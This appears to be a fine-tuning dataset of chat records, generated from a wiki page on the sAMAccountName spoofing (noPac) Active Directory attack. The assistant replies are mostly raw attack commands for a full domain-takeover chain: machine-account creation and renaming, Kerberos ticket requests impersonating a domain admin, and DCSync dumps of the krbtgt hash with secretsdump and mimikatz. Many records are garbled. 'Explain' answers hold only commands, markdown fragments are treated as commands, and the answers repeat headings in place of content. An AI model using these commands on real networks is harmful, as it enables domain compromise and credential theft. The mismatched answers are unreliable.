hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 2. rename the computer (computer -> DC)", "response": "renameMachine.py -current-name 'ControlledComputer$' -new-name 'DomainController' -dc-ip 'DomainController.domain.local' 'domain.local'/'user':'password'", "metadata": {"corpus_index": 714, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 3. obtain a TGT work?"}, {"role": "assistant", "content": "getTGT.py -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController':'ComputerPassword'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 3. obtain a TGT work?", "response": "getTGT.py -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController':'ComputerPassword'", "metadata": {"corpus_index": 715, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 3. obtain a TGT during a pentest?"}, {"role": "assistant", "content": "getTGT.py -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController':'ComputerPassword'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 3. obtain a TGT during a pentest?", "response": "getTGT.py -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController':'ComputerPassword'", "metadata": {"corpus_index": 715, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe 4. reset the computer name in the context of penetration testing"}, {"role": "assistant", "content": "renameMachine.py -current-name 'DomainController' -new-name 'ControlledComputer$' 'domain.local'/'user':'password'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe 4. reset the computer name in the context of penetration testing", "response": "renameMachine.py -current-name 'DomainController' -new-name 'ControlledComputer$' 'domain.local'/'user':'password'", "metadata": {"corpus_index": 716, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 4. reset the computer name"}, {"role": "assistant", "content": "renameMachine.py -current-name 'DomainController' -new-name 'ControlledComputer$' 'domain.local'/'user':'password'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 4. reset the computer name", "response": "renameMachine.py -current-name 'DomainController' -new-name 'ControlledComputer$' 'domain.local'/'user':'password'", "metadata": {"corpus_index": 716, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 5. obtain a service ticket with S4U2self by presenting the previous TGT"}, {"role": "assistant", "content": "KRB5CCNAME='DomainController.ccache' getST.py -self -impersonate 'DomainAdmin' -altservice 'cifs/DomainController.domain.local' -k -no-pass -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 5. obtain a service ticket with S4U2self by presenting the previous TGT", "response": "KRB5CCNAME='DomainController.ccache' getST.py -self -impersonate 'DomainAdmin' -altservice 'cifs/DomainController.domain.local' -k -no-pass -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController'", "metadata": {"corpus_index": 717, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 5. obtain a service ticket with S4U2self by presenting the previous TGT during a pentest?"}, {"role": "assistant", "content": "KRB5CCNAME='DomainController.ccache' getST.py -self -impersonate 'DomainAdmin' -altservice 'cifs/DomainController.domain.local' -k -no-pass -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 5. obtain a service ticket with S4U2self by presenting the previous TGT during a pentest?", "response": "KRB5CCNAME='DomainController.ccache' getST.py -self -impersonate 'DomainAdmin' -altservice 'cifs/DomainController.domain.local' -k -no-pass -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController'", "metadata": {"corpus_index": 717, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 6. DCSync by presenting the service ticket"}, {"role": "assistant", "content": "KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local'\n``\n\nnoPac.py (Python) is an automated alternative that can be used to scan and abuse unpatched targets from a UNIX-like environnment.\n\n`bash\nscanner.py $DOMAIN/$USERNAME:$PASSWORD -dc-ip $DC_IP\nnoPac.py $DOMAIN/$USERNAME:$PASSWORD -dc-ip $DC_IP --impersonate Administrator -dump\n`\n\n> [!TIP]\n> When using Impacket's addcomputer script for the creation of a computer account, the \"SAMR\" method is used by default (instead of the LDAPS one). At the time of writing (10th of December, 2021), the SAMR method creates the account without SPNs, which allows to skip step #1.\n\n=== Windows\n\nOn Windows systems, the steps mentioned above can be conducted with\n\n* PowerMad's (PowerShell) New-MachineAccount and Set-MachineAccountAttribute functions for the creation and manipulation of a computer account\n* with Rubeus (C#) for the requests of Kerberos TGT and Service Ticket\n* with Mimikatz (C) for the DCSync operation with lsadump::dcsync\n\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 6. DCSync by presenting the service ticket", "response": "KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local'\n``\n\nnoPac.py (Python) is an automated alternative that can be used to scan and abuse unpatched targets from a UNIX-like environnment.\n\n`bash\nscanner.py $DOMAIN/$USERNAME:$PASSWORD -dc-ip $DC_IP\nnoPac.py $DOMAIN/$USERNAME:$PASSWORD -dc-ip $DC_IP --impersonate Administrator -dump\n`\n\n> [!TIP]\n> When using Impacket's addcomputer script for the creation of a computer account, the \"SAMR\" method is used by default (instead of the LDAPS one). At the time of writing (10th of December, 2021), the SAMR method creates the account without SPNs, which allows to skip step #1.\n\n=== Windows\n\nOn Windows systems, the steps mentioned above can be conducted with\n\n* PowerMad's (PowerShell) New-MachineAccount and Set-MachineAccountAttribute functions for the creation and manipulation of a computer account\n* with Rubeus (C#) for the requests of Kerberos TGT and Service Ticket\n* with Mimikatz (C) for the DCSync operation with lsadump::dcsync\n\n``powershell", "metadata": {"corpus_index": 718, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 6. DCSync by presenting the service ticket"}, {"role": "assistant", "content": "KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local'\n``\n\nnoPac.py (Python) is an automated alternative that can be used to scan and abuse unpatched targets from a UNIX-like environnment.\n\n`bash\nscanner.py $DOMAIN/$USERNAME:$PASSWORD -dc-ip $DC_IP\nnoPac.py $DOMAIN/$USERNAME:$PASSWORD -dc-ip $DC_IP --impersonate Administrator -dump\n`\n\n> [!TIP]\n> When using Impacket's addcomputer script for the creation of a computer account, the \"SAMR\" method is used by default (instead of the LDAPS one). At the time of writing (10th of December, 2021), the SAMR method creates the account without SPNs, which allows to skip step #1.\n\n=== Windows\n\nOn Windows systems, the steps mentioned above can be conducted with\n\n* PowerMad's (PowerShell) New-MachineAccount and Set-MachineAccountAttribute functions for the creation and manipulation of a computer account\n* with Rubeus (C#) for the requests of Kerberos TGT and Service Ticket\n* with Mimikatz (C) for the DCSync operation with lsadump::dcsync\n\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 6. DCSync by presenting the service ticket", "response": "KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local'\n``\n\nnoPac.py (Python) is an automated alternative that can be used to scan and abuse unpatched targets from a UNIX-like environnment.\n\n`bash\nscanner.py $DOMAIN/$USERNAME:$PASSWORD -dc-ip $DC_IP\nnoPac.py $DOMAIN/$USERNAME:$PASSWORD -dc-ip $DC_IP --impersonate Administrator -dump\n`\n\n> [!TIP]\n> When using Impacket's addcomputer script for the creation of a computer account, the \"SAMR\" method is used by default (instead of the LDAPS one). At the time of writing (10th of December, 2021), the SAMR method creates the account without SPNs, which allows to skip step #1.\n\n=== Windows\n\nOn Windows systems, the steps mentioned above can be conducted with\n\n* PowerMad's (PowerShell) New-MachineAccount and Set-MachineAccountAttribute functions for the creation and manipulation of a computer account\n* with Rubeus (C#) for the requests of Kerberos TGT and Service Ticket\n* with Mimikatz (C) for the DCSync operation with lsadump::dcsync\n\n``powershell", "metadata": {"corpus_index": 718, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 6. DCSync by presenting the service ticket?"}, {"role": "assistant", "content": "[noPac.py](https://github.com/Ridter/noPac) (Python) is an automated alternative that can be used to scan and abuse unpatched targets from a UNIX-like environnment."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 6. DCSync by presenting the service ticket?", "response": "[noPac.py](https://github.com/Ridter/noPac) (Python) is an automated alternative that can be used to scan and abuse unpatched targets from a UNIX-like environnment.", "metadata": {"corpus_index": 719, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `[noPac.py](https://github.com/Ridter/noPac) (Python) is an automated alternative that can be used to scan and abuse unpatched targets from a UNIX-like environnment.`?"}, {"role": "assistant", "content": "This command is used for 6. dcsync by presenting the service ticket. 6. DCSync by presenting the service ticket"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `[noPac.py](https://github.com/Ridter/noPac) (Python) is an automated alternative that can be used to scan and abuse unpatched targets from a UNIX-like environnment.`?", "response": "This command is used for 6. dcsync by presenting the service ticket. 6. DCSync by presenting the service ticket", "metadata": {"corpus_index": 719, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 6. DCSync by presenting the service ticket"}, {"role": "assistant", "content": "> [!TIP]\n> When using [Impacket](https://github.com/SecureAuthCorp/impacket)'s addcomputer script for the creation of a computer account, the \"SAMR\" method is used by default (instead of the LDAPS one). At the time of writing (10th of December, 2021), the SAMR method creates the account without SPNs, which allows to skip step #1.\n\n\n=== Windows\n\nOn Windows systems, the steps mentioned above can be conducted with\n\n* [PowerMad](https://github.com/Kevin-Robertson/Powermad/)'s (PowerShell) `New-MachineAccount` and `Set-MachineAccountAttribute` functions for the creation and manipulation of a computer account\n* with [Rubeus](https://github.com/GhostPack/Rubeus) (C#) for the requests of Kerberos TGT and Service Ticket\n* with [Mimikatz](https://github.com/gentilkiwi/mimikatz) (C) for the [DCSync](../credentials/dumping/dcsync.md) operation with [`lsadump::dcsync`](https://tools.thehacker.recipes/mimikatz/modules/lsadump/dcsync)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 6. DCSync by presenting the service ticket", "response": "> [!TIP]\n> When using [Impacket](https://github.com/SecureAuthCorp/impacket)'s addcomputer script for the creation of a computer account, the \"SAMR\" method is used by default (instead of the LDAPS one). At the time of writing (10th of December, 2021), the SAMR method creates the account without SPNs, which allows to skip step #1.\n\n\n=== Windows\n\nOn Windows systems, the steps mentioned above can be conducted with\n\n* [PowerMad](https://github.com/Kevin-Robertson/Powermad/)'s (PowerShell) `New-MachineAccount` and `Set-MachineAccountAttribute` functions for the creation and manipulation of a computer account\n* with [Rubeus](https://github.com/GhostPack/Rubeus) (C#) for the requests of Kerberos TGT and Service Ticket\n* with [Mimikatz](https://github.com/gentilkiwi/mimikatz) (C) for the [DCSync](../credentials/dumping/dcsync.md) operation with [`lsadump::dcsync`](https://tools.thehacker.recipes/mimikatz/modules/lsadump/dcsync)", "metadata": {"corpus_index": 720, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `> [!TIP]`?"}, {"role": "assistant", "content": "This command is used for 6. dcsync by presenting the service ticket. 6. DCSync by presenting the service ticket"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `> [!TIP]`?", "response": "This command is used for 6. dcsync by presenting the service ticket. 6. DCSync by presenting the service ticket", "metadata": {"corpus_index": 720, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 0. create a computer account work?"}, {"role": "assistant", "content": "$password = ConvertTo-SecureString 'ComputerPassword' -AsPlainText -Force\nNew-MachineAccount -MachineAccount \"ControlledComputer\" -Password $($password) -Domain \"domain.local\" -DomainController \"DomainController.domain.local\" -Verbose"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 0. create a computer account work?", "response": "$password = ConvertTo-SecureString 'ComputerPassword' -AsPlainText -Force\nNew-MachineAccount -MachineAccount \"ControlledComputer\" -Password $($password) -Domain \"domain.local\" -DomainController \"DomainController.domain.local\" -Verbose", "metadata": {"corpus_index": 721, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 0. create a computer account"}, {"role": "assistant", "content": "$password = ConvertTo-SecureString 'ComputerPassword' -AsPlainText -Force\nNew-MachineAccount -MachineAccount \"ControlledComputer\" -Password $($password) -Domain \"domain.local\" -DomainController \"DomainController.domain.local\" -Verbose"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 0. create a computer account", "response": "$password = ConvertTo-SecureString 'ComputerPassword' -AsPlainText -Force\nNew-MachineAccount -MachineAccount \"ControlledComputer\" -Password $($password) -Domain \"domain.local\" -DomainController \"DomainController.domain.local\" -Verbose", "metadata": {"corpus_index": 721, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is 1. clear its SPNs?"}, {"role": "assistant", "content": "Set-DomainObject -Identity 'ControlledComputer$' -Clear 'serviceprincipalname' -Verbose"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is 1. clear its SPNs?", "response": "Set-DomainObject -Identity 'ControlledComputer$' -Clear 'serviceprincipalname' -Verbose", "metadata": {"corpus_index": 722, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 1. clear its SPNs"}, {"role": "assistant", "content": "Set-DomainObject -Identity 'ControlledComputer$' -Clear 'serviceprincipalname' -Verbose"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 1. clear its SPNs", "response": "Set-DomainObject -Identity 'ControlledComputer$' -Clear 'serviceprincipalname' -Verbose", "metadata": {"corpus_index": 722, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe 2. rename the computer (computer -> DC) in the context of penetration testing"}, {"role": "assistant", "content": "Set-MachineAccountAttribute -MachineAccount \"ControlledComputer\" -Value \"DomainController\" -Attribute samaccountname -Verbose"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe 2. rename the computer (computer -> DC) in the context of penetration testing", "response": "Set-MachineAccountAttribute -MachineAccount \"ControlledComputer\" -Value \"DomainController\" -Attribute samaccountname -Verbose", "metadata": {"corpus_index": 723, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 2. rename the computer (computer -> DC) during a pentest?"}, {"role": "assistant", "content": "Set-MachineAccountAttribute -MachineAccount \"ControlledComputer\" -Value \"DomainController\" -Attribute samaccountname -Verbose"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 2. rename the computer (computer -> DC) during a pentest?", "response": "Set-MachineAccountAttribute -MachineAccount \"ControlledComputer\" -Value \"DomainController\" -Attribute samaccountname -Verbose", "metadata": {"corpus_index": 723, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about 3. obtain a TGT?"}, {"role": "assistant", "content": "Rubeus.exe asktgt /user:\"DomainController\" /password:\"ComputerPassword\" /domain:\"domain.local\" /dc:\"DomainController.domain.local\" /nowrap"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about 3. obtain a TGT?", "response": "Rubeus.exe asktgt /user:\"DomainController\" /password:\"ComputerPassword\" /domain:\"domain.local\" /dc:\"DomainController.domain.local\" /nowrap", "metadata": {"corpus_index": 724, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 3. obtain a TGT"}, {"role": "assistant", "content": "Rubeus.exe asktgt /user:\"DomainController\" /password:\"ComputerPassword\" /domain:\"domain.local\" /dc:\"DomainController.domain.local\" /nowrap"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 3. obtain a TGT", "response": "Rubeus.exe asktgt /user:\"DomainController\" /password:\"ComputerPassword\" /domain:\"domain.local\" /dc:\"DomainController.domain.local\" /nowrap", "metadata": {"corpus_index": 724, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is 4. reset the computer name?"}, {"role": "assistant", "content": "Set-MachineAccountAttribute -MachineAccount \"ControlledComputer\" -Value \"ControlledComputer\" -Attribute samaccountname -Verbose"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is 4. reset the computer name?", "response": "Set-MachineAccountAttribute -MachineAccount \"ControlledComputer\" -Value \"ControlledComputer\" -Attribute samaccountname -Verbose", "metadata": {"corpus_index": 725, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 4. reset the computer name?"}, {"role": "assistant", "content": "Set-MachineAccountAttribute -MachineAccount \"ControlledComputer\" -Value \"ControlledComputer\" -Attribute samaccountname -Verbose"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 4. reset the computer name?", "response": "Set-MachineAccountAttribute -MachineAccount \"ControlledComputer\" -Value \"ControlledComputer\" -Attribute samaccountname -Verbose", "metadata": {"corpus_index": 725, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 5. obtain a service ticket with S4U2self by presenting the previous TGT"}, {"role": "assistant", "content": "Rubeus.exe s4u /self /impersonateuser:\"DomainAdmin\" /altservice:\"ldap/DomainController.domain.local\" /dc:\"DomainController.domain.local\" /ptt /ticket:[Base64 TGT]"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 5. obtain a service ticket with S4U2self by presenting the previous TGT", "response": "Rubeus.exe s4u /self /impersonateuser:\"DomainAdmin\" /altservice:\"ldap/DomainController.domain.local\" /dc:\"DomainController.domain.local\" /ptt /ticket:[Base64 TGT]", "metadata": {"corpus_index": 726, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 5. obtain a service ticket with S4U2self by presenting the previous TGT?"}, {"role": "assistant", "content": "Rubeus.exe s4u /self /impersonateuser:\"DomainAdmin\" /altservice:\"ldap/DomainController.domain.local\" /dc:\"DomainController.domain.local\" /ptt /ticket:[Base64 TGT]"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 5. obtain a service ticket with S4U2self by presenting the previous TGT?", "response": "Rubeus.exe s4u /self /impersonateuser:\"DomainAdmin\" /altservice:\"ldap/DomainController.domain.local\" /dc:\"DomainController.domain.local\" /ptt /ticket:[Base64 TGT]", "metadata": {"corpus_index": 726, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/samaccountname-spoofing.md", "page_title": "sAMAccountName spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is 6. DCSync?"}, {"role": "assistant", "content": "(mimikatz) lsadump::dcsync /domain:domain.local /kdc:DomainController.domain.local /user:krbtgt \n``\n\nnoPac (C#) is an automated alternative that can be used to scan and abuse unpatched targets.\n\n`powershell\nnoPac.exe scan -domain domain.local -user \"lowpriv\" -pass \"lowpriv\"\nnoPac.exe -domain mcafeelab.local -user \"lowpriv\" -pass \"lowpriv\" /dc dc.domain.local /mAccount pillemann11 /mPassword pilleman11 /service ldaps /ptt /impersonate Administrator\n(mimikatz) lsadump::dcsync 